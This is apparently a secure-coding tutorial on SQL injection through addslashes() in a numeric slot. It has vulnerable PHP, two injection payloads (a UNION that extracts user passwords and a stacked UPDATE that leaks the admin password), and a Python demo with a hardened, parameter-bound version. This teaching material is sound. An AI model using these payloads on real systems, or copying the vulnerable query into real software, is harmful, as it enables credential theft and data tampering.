Attack Alert :: Escaping SQL

    // Vulnerable: the value is spliced into an unquoted numeric position, so
    // addslashes() (which only escapes quotes, backslashes and NUL) cannot contain it.
    $sql = "SELECT id, headline, author FROM news WHERE cat_id = " . addslashes($_REQUEST['category_id']);
Evil Inputs:
    12 UNION SELECT 1337,username,password FROM user

    12; UPDATE news SET headline = (SELECT password FROM user WHERE username = char(97,100,109,105,110)) WHERE id = 1234
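The following is an added example, not code from the original page: it re-creates the page's PHP pattern in Python against an in-memory SQLite database (a stand-in for MySQL) with a constructed `news`/`user` schema, shows that addslashes-style escaping leaves the first evil input untouched in an unquoted numeric position, and puts the hardened form (integer validation plus a bound parameter) beside it.

```python
import re
import sqlite3


def addslashes(s: str) -> str:
    """Mimic PHP addslashes(): backslash-escape quotes, backslashes and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and rows matching the page's table names."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, headline TEXT, author TEXT, cat_id INTEGER);
        CREATE TABLE user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Release notes', 'alice', 12);
        INSERT INTO user VALUES (1, 'admin', 'hunter2');  -- constructed sample data
    """)
    return conn


def vulnerable_query(conn: sqlite3.Connection, category_id: str) -> list:
    """The page's pattern: escaping applied to a value in an unquoted numeric slot.

    No quote is needed to break out, so addslashes() changes nothing, and
    a UNION payload is simply appended to the statement.
    """
    sql = ("SELECT id, headline, author FROM news WHERE cat_id = "
           + addslashes(category_id))
    return conn.execute(sql).fetchall()


def safe_query(conn: sqlite3.Connection, category_id: str) -> list:
    """Hardened form: validate the input as a plain integer, then bind it.

    The payload never becomes part of the SQL text, and anything that is
    not a decimal integer is rejected before the query is built.
    """
    if not re.fullmatch(r"[0-9]+", category_id):
        raise ValueError("category_id must be a non-negative integer")
    sql = "SELECT id, headline, author FROM news WHERE cat_id = ?"
    return conn.execute(sql, (int(category_id),)).fetchall()
```

The second evil input (a stacked `UPDATE`) is not reproduced here because `sqlite3.execute()` refuses multiple statements; the same validation and parameter binding stops it for the same reason.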